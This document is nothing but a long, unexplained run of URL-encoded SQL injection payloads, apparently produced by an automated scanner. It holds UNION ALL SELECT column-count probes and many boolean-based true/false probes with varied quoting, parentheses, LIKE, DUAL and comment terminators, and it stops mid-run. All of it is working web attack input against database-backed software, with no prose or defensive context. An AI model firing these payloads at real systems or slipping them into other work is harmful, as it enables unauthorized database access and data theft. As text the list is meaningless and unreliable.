-7148%27%20%2B%20%28SELECT%20%27WBWB%27%20WHERE%208672%3D8672%20UNION%20ALL%20SELECT%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%2C%208672%00%20%29%20%2B%20%27 -4445%27%20%2B%20%28SELECT%20%27AFNl%27%20WHERE%209304%3D9304%20UNION%20ALL%20SELECT%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%2C%209304%00%20%29%20%2B%20%27 -2030%27%20%2B%20%28SELECT%20%27JkYD%27%20WHERE%206848%3D6848%20UNION%20ALL%20SELECT%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%2C%206848%00%20%29%20%2B%20%27 -6509%27%20%2B%20%28SELECT%20%27tgAW%27%20WHERE%208289%3D8289%20UNION%20ALL%20SELECT%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%2C%208289%00%20%29%20%2B%20%27 -9459%27%20%2B%20%28SELECT%20%27IinA%27%20WHERE%208496%3D8496%20UNION%20ALL%20SELECT%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%2C%208496%00%20%29%20%2B%20%27 -3486%27%20%2B%20%28SELECT%20%27xYDf%27%20WHERE%203718%3D3718%20UNION%20ALL%20SELECT%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%00%20%29%20%2B%20%27 -7356%27%20%2B%20%28SELECT%20%27ywMJ%27%20WHERE%208069%3D8069%20UNION%20ALL%20SELECT%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%2C%208069%00%20%29%20%2B%20%27 -1325%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209043%2C%209043%2C%209043%2C%209043%2C%209043%2C%209043%2C%209043%2C%209043%2C%209043%2C%209043%2C%209043%2C%209043%2C%209043%2C%209043%2C%209043%2C%209043%2C%209043%2C%209043%2C%209043%2C%209043%2C%209043%2C%209043%2C%209043%2C%209043%2C%209043%2C%209043%2C%209043%2C%209043%2C%209043%2C%209043%2C%209043%2C%209043%2C%209043%2C%209043%2C%209043%2C%209043%2C%209043%2C%209043%2C%209043%2C%209043%2C%209043%00%20%23 -9713%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%2C%201044%00%20%23 -4661%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%00%20%23 -4586%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%2C%206670%00%20%23 -6269%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%2C%209641%00%20%23 -1227%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%2C%204493%00%20%23 -7354%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%2C%205795%00%20%23 -3734%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%2C%202032%00%20%23 -3937%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%00%20%23 -2525%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%00%20%23 ## foo%28%29%28%22%29%27%28%29%22%22 foo%29%20AND%201211%3D2842 foo%29%20AND%208492%3D8492 foo%29%20AND%202841%3D7638 foo%27%29%20AND%208422%3D8593 foo%27%29%20AND%208492%3D8492 foo%27%29%20AND%204636%3D9633 foo%27%20AND%208146%3D2594 foo%27%20AND%208492%3D8492 foo%27%20AND%207407%3D1470 foo%22%20AND%204947%3D5284 foo%22%20AND%208492%3D8492 foo%22%20AND%205529%3D4960 foo%29%20AND%209522%3D5491%20AND%20%284701%3D4701 foo%29%20AND%208492%3D8492%20AND%20%287504%3D7504 foo%29%20AND%205674%3D7582%20AND%20%288049%3D8049 foo%29%29%20AND%204310%3D5607%20AND%20%28%285697%3D5697 foo%29%29%20AND%208492%3D8492%20AND%20%28%285229%3D5229 foo%29%29%20AND%204879%3D9041%20AND%20%28%289170%3D9170 foo%29%29%29%20AND%207453%3D1284%20AND%20%28%28%283483%3D3483 foo%29%29%29%20AND%208492%3D8492%20AND%20%28%28%283175%3D3175 foo%29%29%29%20AND%206150%3D9572%20AND%20%28%28%281403%3D1403 foo%20AND%207766%3D4239 foo%20AND%208492%3D8492 foo%20AND%204186%3D4679 foo%27%29%20AND%205446%3D1230%20AND%20%28%27HcXz%27%3D%27HcXz foo%27%29%20AND%208492%3D8492%20AND%20%28%27vEuZ%27%3D%27vEuZ foo%27%29%20AND%209308%3D1345%20AND%20%28%27bOrb%27%3D%27bOrb foo%27%29%29%20AND%208860%3D6349%20AND%20%28%28%27ufUv%27%3D%27ufUv foo%27%29%29%20AND%208492%3D8492%20AND%20%28%28%27KOGt%27%3D%27KOGt foo%27%29%29%20AND%204521%3D3271%20AND%20%28%28%27ASrO%27%3D%27ASrO foo%27%29%29%29%20AND%206580%3D5307%20AND%20%28%28%28%27eNSL%27%3D%27eNSL foo%27%29%29%29%20AND%208492%3D8492%20AND%20%28%28%28%27jOOR%27%3D%27jOOR foo%27%29%29%29%20AND%207530%3D4084%20AND%20%28%28%28%27BKas%27%3D%27BKas foo%27%20AND%202315%3D6918%20AND%20%27FrMo%27%3D%27FrMo foo%27%20AND%208492%3D8492%20AND%20%27tSxr%27%3D%27tSxr foo%27%20AND%202182%3D8311%20AND%20%27QtXp%27%3D%27QtXp foo%27%29%20AND%207373%3D4281%20AND%20%28%27rQNn%27%20LIKE%20%27rQNn foo%27%29%20AND%208492%3D8492%20AND%20%28%27ziVK%27%20LIKE%20%27ziVK foo%27%29%20AND%206163%3D8888%20AND%20%28%27MIwZ%27%20LIKE%20%27MIwZ foo%27%29%29%20AND%208072%3D7694%20AND%20%28%28%27zCOl%27%20LIKE%20%27zCOl foo%27%29%29%20AND%208492%3D8492%20AND%20%28%28%27EcxI%27%20LIKE%20%27EcxI foo%27%29%29%20AND%208092%3D8803%20AND%20%28%28%27yYBS%27%20LIKE%20%27yYBS foo%27%29%29%29%20AND%209218%3D3207%20AND%20%28%28%28%27tZNp%27%20LIKE%20%27tZNp foo%27%29%29%29%20AND%208492%3D8492%20AND%20%28%28%28%27RQck%27%20LIKE%20%27RQck foo%27%29%29%29%20AND%205960%3D7165%20AND%20%28%28%28%27dpmQ%27%20LIKE%20%27dpmQ foo%27%20AND%206744%3D6705%20AND%20%27TYfz%27%20LIKE%20%27TYfz foo%27%20AND%208492%3D8492%20AND%20%27QDSl%27%20LIKE%20%27QDSl foo%27%20AND%202162%3D1395%20AND%20%27KHSG%27%20LIKE%20%27KHSG foo%22%29%20AND%204708%3D6152%20AND%20%28%22YVXU%22%3D%22YVXU foo%22%29%20AND%208492%3D8492%20AND%20%28%22WMPR%22%3D%22WMPR foo%22%29%20AND%206366%3D9798%20AND%20%28%22Dqie%22%3D%22Dqie foo%22%29%29%20AND%201207%3D7064%20AND%20%28%28%22Sdvn%22%3D%22Sdvn foo%22%29%29%20AND%208492%3D8492%20AND%20%28%28%22BpVs%22%3D%22BpVs foo%22%29%29%20AND%205371%3D1303%20AND%20%28%28%22KbtQ%22%3D%22KbtQ foo%22%29%29%29%20AND%206997%3D7620%20AND%20%28%28%28%22MMKO%22%3D%22MMKO foo%22%29%29%29%20AND%208492%3D8492%20AND%20%28%28%28%22lCIV%22%3D%22lCIV foo%22%29%29%29%20AND%208964%3D8890%20AND%20%28%28%28%22UrDe%22%3D%22UrDe foo%22%20AND%205140%3D6864%20AND%20%22Cvvk%22%3D%22Cvvk foo%22%20AND%208492%3D8492%20AND%20%22waOB%22%3D%22waOB foo%22%20AND%206549%3D3410%20AND%20%22NeLG%22%3D%22NeLG foo%22%29%20AND%203878%3D9032%20AND%20%28%22crMU%22%20LIKE%20%22crMU foo%22%29%20AND%208492%3D8492%20AND%20%28%22rfTN%22%20LIKE%20%22rfTN foo%22%29%20AND%204995%3D1978%20AND%20%28%22zdRI%22%20LIKE%20%22zdRI foo%22%29%29%20AND%204836%3D9908%20AND%20%28%28%22Cdmp%22%20LIKE%20%22Cdmp foo%22%29%29%20AND%208492%3D8492%20AND%20%28%28%22hPBN%22%20LIKE%20%22hPBN foo%22%29%29%20AND%205662%3D9483%20AND%20%28%28%22yAgH%22%20LIKE%20%22yAgH foo%22%29%29%29%20AND%207359%3D7823%20AND%20%28%28%28%22rTsY%22%20LIKE%20%22rTsY foo%22%29%29%29%20AND%208492%3D8492%20AND%20%28%28%28%22uqJt%22%20LIKE%20%22uqJt foo%22%29%29%29%20AND%202345%3D6948%20AND%20%28%28%28%22sUSs%22%20LIKE%20%22sUSs foo%22%20AND%201818%3D1960%20AND%20%22zERB%22%20LIKE%20%22zERB foo%22%20AND%208492%3D8492%20AND%20%22gRcN%22%20LIKE%20%22gRcN foo%22%20AND%206841%3D1453%20AND%20%22pjje%22%20LIKE%20%22pjje foo%29%20WHERE%201770%3D1770%20AND%204163%3D9292 foo%29%20WHERE%205912%3D5912%20AND%208492%3D8492 foo%29%20WHERE%207408%3D7408%20AND%209824%3D1408 foo%27%29%20WHERE%207328%3D7328%20AND%207391%3D6116 foo%27%29%20WHERE%206030%3D6030%20AND%208492%3D8492 foo%27%29%20WHERE%204605%3D4605%20AND%205906%3D3136 foo%27%20WHERE%205599%3D5599%20AND%203645%3D2983 foo%27%20WHERE%208512%3D8512%20AND%208492%3D8492 foo%27%20WHERE%202638%3D2638%20AND%202486%3D3709 foo%22%20WHERE%207653%3D7653%20AND%202331%3D3524 foo%22%20WHERE%202670%3D2670%20AND%208492%3D8492 foo%22%20WHERE%207433%3D7433%20AND%204268%3D2096 foo%27%20%7C%7C%20%28SELECT%206223%20FROM%20DUAL%20WHERE%209559%3D9559%20AND%204322%3D5163%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%205929%20FROM%20DUAL%20WHERE%207303%3D7303%20AND%208492%3D8492%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%208782%20FROM%20DUAL%20WHERE%205748%3D5748%20AND%204910%3D7683%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%203241%20WHERE%209288%3D9288%20AND%202854%3D2448%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%206285%20WHERE%201158%3D1158%20AND%208492%3D8492%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%206528%20WHERE%203456%3D3456%20AND%205980%3D6576%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%207557%20FROM%20DUAL%20WHERE%205047%3D5047%20AND%201759%3D5916%20%29 foo%20%2B%20%28SELECT%207478%20FROM%20DUAL%20WHERE%204021%3D4021%20AND%208492%3D8492%20%29 foo%20%2B%20%28SELECT%202125%20FROM%20DUAL%20WHERE%203801%3D3801%20AND%209555%3D1215%20%29 foo%20%2B%20%28SELECT%208403%20WHERE%206864%3D6864%20AND%208919%3D7591%20%29 foo%20%2B%20%28SELECT%209448%20WHERE%206984%3D6984%20AND%208492%3D8492%20%29 foo%20%2B%20%28SELECT%202044%20WHERE%205345%3D5345%20AND%201536%3D3097%20%29 foo%27%20%2B%20%28SELECT%20%27LUfn%27%20FROM%20DUAL%20WHERE%202595%3D2595%20AND%209450%3D8250%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27QdOh%27%20FROM%20DUAL%20WHERE%207542%3D7542%20AND%208492%3D8492%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27QjqB%27%20FROM%20DUAL%20WHERE%205117%3D5117%20AND%205473%3D7584%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27KPVm%27%20WHERE%203842%3D3842%20AND%202134%3D1757%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27AjWC%27%20WHERE%203804%3D3804%20AND%208492%3D8492%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27WKgw%27%20WHERE%206341%3D6341%20AND%209153%3D9584%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%204734%3D5267%20%23 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%208492%3D8492%20%23 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%202254%3D9042%20%23 foo%29%20AND%202691%3D1162%23 foo%29%20AND%202041%3D2041%23 foo%29%20AND%202159%3D8842%23 foo%27%29%20AND%204668%3D2120%23 foo%27%29%20AND%202041%3D2041%23 foo%27%29%20AND%207112%3D5492%23 foo%27%20AND%209788%3D7176%23 foo%27%20AND%202041%3D2041%23 foo%27%20AND%207333%3D4145%23 foo%22%20AND%202592%3D6776%23 foo%22%20AND%202041%3D2041%23 foo%22%20AND%206634%3D5365%23 foo%29%20AND%204499%3D8923%23%20AND%20%286455%3D6455 foo%29%20AND%202041%3D2041%23%20AND%20%287568%3D7568 foo%29%20AND%204939%3D2613%23%20AND%20%283397%3D3397 foo%29%29%20AND%201071%3D6626%23%20AND%20%28%289521%3D9521 foo%29%29%20AND%202041%3D2041%23%20AND%20%28%285237%3D5237 foo%29%29%20AND%207100%3D1991%23%20AND%20%28%283893%3D3893 foo%29%29%29%20AND%209417%3D5037%23%20AND%20%28%28%283947%3D3947 foo%29%29%29%20AND%202041%3D2041%23%20AND%20%28%28%287308%3D7308 foo%29%29%29%20AND%208104%3D5760%23%20AND%20%28%28%282386%3D2386 foo%20AND%202511%3D7975%23 foo%20AND%202041%3D2041%23 foo%20AND%201034%3D4258%23 foo%27%29%20AND%203953%3D3181%23%20AND%20%28%27XIOy%27%3D%27XIOy foo%27%29%20AND%202041%3D2041%23%20AND%20%28%27pHvx%27%3D%27pHvx foo%27%29%20AND%201637%3D1727%23%20AND%20%28%27vhPk%27%3D%27vhPk foo%27%29%29%20AND%204763%3D4465%23%20AND%20%28%28%27BgUr%27%3D%27BgUr foo%27%29%29%20AND%202041%3D2041%23%20AND%20%28%28%27ZkiX%27%3D%27ZkiX foo%27%29%29%20AND%203697%3D2741%23%20AND%20%28%28%27zufs%27%3D%27zufs foo%27%29%29%29%20AND%206879%3D1970%23%20AND%20%28%28%28%27tkLP%27%3D%27tkLP foo%27%29%29%29%20AND%202041%3D2041%23%20AND%20%28%28%28%27uhRM%27%3D%27uhRM foo%27%29%29%29%20AND%205919%3D6737%23%20AND%20%28%28%28%27CwHQ%27%3D%27CwHQ foo%27%20AND%206296%3D7730%23%20AND%20%27tsKP%27%3D%27tsKP foo%27%20AND%202041%3D2041%23%20AND%20%27aciV%27%3D%27aciV foo%27%20AND%208248%3D9331%23%20AND%20%27rGdy%27%3D%27rGdy foo%27%29%20AND%206934%3D7735%23%20AND%20%28%27bOrB%27%20LIKE%20%27bOrB foo%27%29%20AND%202041%3D2041%23%20AND%20%28%27fSGa%27%20LIKE%20%27fSGa foo%27%29%20AND%202895%3D6156%23%20AND%20%28%27xZIm%27%20LIKE%20%27xZIm foo%27%29%29%20AND%206554%3D6836%23%20AND%20%28%28%27UFYG%27%20LIKE%20%27UFYG foo%27%29%29%20AND%202041%3D2041%23%20AND%20%28%28%27zguv%27%20LIKE%20%27zguv foo%27%29%29%20AND%204333%3D9576%23%20AND%20%28%28%27ZTTB%27%20LIKE%20%27ZTTB foo%27%29%29%29%20AND%209075%3D2705%23%20AND%20%28%28%28%27WPqu%27%20LIKE%20%27WPqu foo%27%29%29%29%20AND%202041%3D2041%23%20AND%20%28%28%28%27nXst%27%20LIKE%20%27nXst foo%27%29%29%29%20AND%207870%3D4685%23%20AND%20%28%28%28%27buGD%27%20LIKE%20%27buGD foo%27%20AND%209091%3D1291%23%20AND%20%27dgBq%27%20LIKE%20%27dgBq foo%27%20AND%202041%3D2041%23%20AND%20%27dUKs%27%20LIKE%20%27dUKs foo%27%20AND%207373%3D4143%23%20AND%20%27hFUr%27%20LIKE%20%27hFUr foo%22%29%20AND%209437%3D7892%23%20AND%20%28%22VQjV%22%3D%22VQjV foo%22%29%20AND%202041%3D2041%23%20AND%20%28%22DHCu%22%3D%22DHCu foo%22%29%20AND%202405%3D7494%23%20AND%20%28%22adrj%22%3D%22adrj foo%22%29%29%20AND%205969%3D8624%23%20AND%20%28%28%22XiFr%22%3D%22XiFr foo%22%29%29%20AND%202041%3D2041%23%20AND%20%28%28%22GoEd%22%3D%22GoEd foo%22%29%29%20AND%201375%3D6011%23%20AND%20%28%28%22sKOp%22%3D%22sKOp foo%22%29%29%29%20AND%206480%3D8175%23%20AND%20%28%28%28%22dUeS%22%3D%22dUeS foo%22%29%29%29%20AND%202041%3D2041%23%20AND%20%28%28%28%22cdlg%22%3D%22cdlg foo%22%29%29%29%20AND%209436%3D9727%23%20AND%20%28%28%28%22Oluq%22%3D%22Oluq foo%22%20AND%209827%3D7974%23%20AND%20%22Sjov%22%3D%22Sjov foo%22%20AND%202041%3D2041%23%20AND%20%22BQbK%22%3D%22BQbK foo%22%20AND%202114%3D4565%23%20AND%20%22gXKV%22%3D%22gXKV foo%22%29%20AND%208557%3D5350%23%20AND%20%28%22OyKD%22%20LIKE%20%22OyKD foo%22%29%20AND%202041%3D2041%23%20AND%20%28%22LcFa%22%20LIKE%20%22LcFa foo%22%29%20AND%203317%3D3627%23%20AND%20%28%22ZXcB%22%20LIKE%20%22ZXcB foo%22%29%29%20AND%205183%3D5562%23%20AND%20%28%28%22JJVG%22%20LIKE%20%22JJVG foo%22%29%29%20AND%202041%3D2041%23%20AND%20%28%28%22iNlT%22%20LIKE%20%22iNlT foo%22%29%29%20AND%203667%3D7512%23%20AND%20%28%28%22pFPF%22%20LIKE%20%22pFPF foo%22%29%29%29%20AND%205984%3D4228%23%20AND%20%28%28%28%22pjpA%22%20LIKE%20%22pjpA foo%22%29%29%29%20AND%202041%3D2041%23%20AND%20%28%28%28%22ANpk%22%20LIKE%20%22ANpk foo%22%29%29%29%20AND%206922%3D1180%23%20AND%20%28%28%28%22koow%22%20LIKE%20%22koow foo%22%20AND%208728%3D7417%23%20AND%20%22cdYf%22%20LIKE%20%22cdYf foo%22%20AND%202041%3D2041%23%20AND%20%22WOUe%22%20LIKE%20%22WOUe foo%22%20AND%206349%3D1782%23%20AND%20%22SCzy%22%20LIKE%20%22SCzy foo%29%20WHERE%207123%3D7123%20AND%201896%3D2868%23 foo%29%20WHERE%207394%3D7394%20AND%202041%3D2041%23 foo%29%20WHERE%203506%3D3506%20AND%207324%3D3349%23 foo%27%29%20WHERE%204622%3D4622%20AND%208157%3D6867%23 foo%27%29%20WHERE%205939%3D5939%20AND%202041%3D2041%23 foo%27%29%20WHERE%209223%3D9223%20AND%209687%3D6210%23 foo%27%20WHERE%207093%3D7093%20AND%204828%3D9649%23 foo%27%20WHERE%205434%3D5434%20AND%202041%3D2041%23 foo%27%20WHERE%201523%3D1523%20AND%207214%3D6228%23 foo%22%20WHERE%209871%3D9871%20AND%203109%3D1340%23 foo%22%20WHERE%205582%3D5582%20AND%202041%3D2041%23 foo%22%20WHERE%206380%3D6380%20AND%204196%3D3382%23 foo%27%20%7C%7C%20%28SELECT%209715%20FROM%20DUAL%20WHERE%203301%3D3301%20AND%203125%3D6490%23%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%201808%20FROM%20DUAL%20WHERE%204372%3D4372%20AND%202041%3D2041%23%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%205574%20FROM%20DUAL%20WHERE%204087%3D4087%20AND%206004%3D6982%23%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%208449%20WHERE%206199%3D6199%20AND%207909%3D9251%23%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%206704%20WHERE%207302%3D7302%20AND%202041%3D2041%23%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%205897%20WHERE%207707%3D7707%20AND%208552%3D6552%23%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%207724%20FROM%20DUAL%20WHERE%207309%3D7309%20AND%202288%3D6144%23%20%29 foo%20%2B%20%28SELECT%207216%20FROM%20DUAL%20WHERE%203583%3D3583%20AND%202041%3D2041%23%20%29 foo%20%2B%20%28SELECT%208056%20FROM%20DUAL%20WHERE%202716%3D2716%20AND%204027%3D5168%23%20%29 foo%20%2B%20%28SELECT%203477%20WHERE%208104%3D8104%20AND%204565%3D8993%23%20%29 foo%20%2B%20%28SELECT%207252%20WHERE%208052%3D8052%20AND%202041%3D2041%23%20%29 foo%20%2B%20%28SELECT%207026%20WHERE%209357%3D9357%20AND%209072%3D6409%23%20%29 foo%27%20%2B%20%28SELECT%20%27TPPe%27%20FROM%20DUAL%20WHERE%203239%3D3239%20AND%208544%3D2962%23%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27sFyR%27%20FROM%20DUAL%20WHERE%208981%3D8981%20AND%202041%3D2041%23%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27rIQo%27%20FROM%20DUAL%20WHERE%207206%3D7206%20AND%202791%3D9093%23%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27Ryfc%27%20WHERE%202398%3D2398%20AND%203364%3D2563%23%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27LzoK%27%20WHERE%204792%3D4792%20AND%202041%3D2041%23%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27URZo%27%20WHERE%207238%3D7238%20AND%209169%3D8242%23%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%209275%3D9817%23%20%23 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%202041%3D2041%23%20%23 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%207624%3D6022%23%20%23 foo%29%20AND%203801%3D5203--%20 